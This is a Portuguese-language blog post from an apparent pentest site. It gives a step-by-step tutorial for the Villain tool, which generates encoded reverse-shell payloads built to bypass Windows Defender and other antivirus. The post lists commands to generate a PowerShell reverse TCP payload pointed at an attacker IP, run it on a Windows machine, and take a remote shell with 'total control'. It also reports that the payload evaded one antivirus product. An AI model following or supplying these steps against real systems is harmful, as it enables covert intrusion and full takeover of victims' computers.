Pentest | TechCruz #keepsecurity

Office Address

123/A, Miranda City Likaoli
Prikano, Dope

Phone Number

+0989 7876 9865 9
+(090) 8765 86543 85

Villain - Reverse Shell

Villain - Reverse Shell

⚡ Esta versão é recente e ainda está sendo testada.

Olá Pessoal, vamos começar a semana analisando essa ferramenta de bypass? Bom ainda não consigo precisar com exatidão o poder dessa ferramenta, mas ja adianto que vai ser bem legal. Vamos comigo?

#Propósito

Villain é uma ferramenta desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e outros Antivírus de mercado.

#Instalação e Uso

⚠️ Villain foi desenvolvido e testado no kali linux.

1 - $ Realize o clone do projeto Villain e liste o conteúdo do diretório.

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

2 - $ Realize a instalação das dependências :

pip install -r requirements.txt

3 - $ Execute o script Villain.py

python Villain.py

4 - $ Para explorar as opções disponíveis na ferramenta digite o comando help:

Villain > help

5 - $ Para saber como gerar um payload para Windows ou Linux execute o comando help generate:

Villain > help generate

6 - $ Gerando o payload para uma máquina com Windows.

lhost: É o IP ou a Interface de rede do host do atacante, ou seja, seu KaliLinux

Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=172.22.35.252 encode
ou
Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0 encode

7 - $ Execute na máquina Windows o payload gerado no passo anterior.

Teste 01:


No meu primeiro teste, recebi uma mensagem de que meu payloag foi bloqueado pelo antivirus, mas não vamos parar por aqui. Vamos tentar outra solução de Antivirus.

Na segunda tentativa obtivemos acesso a maquina infectada com o payload.

É desse tipo de mensagem que a gente gosta!

8 - $ Observe que foi estabalecida uma sessão, para visualizar digite o comando sessions :

Villain > sessions

9 - $ Execute o comando shell < Session ID >.

Assim que o shell for realizado você tem total controle do host da infectado com o payload.

#Observações importantes

Em breve vamos trazer o step by step para linux, mas se você seguir os passos listados acima, lembrando de executar o comando $ Villain > help generate para copiar a linha do payload para S.O Linux.

Share: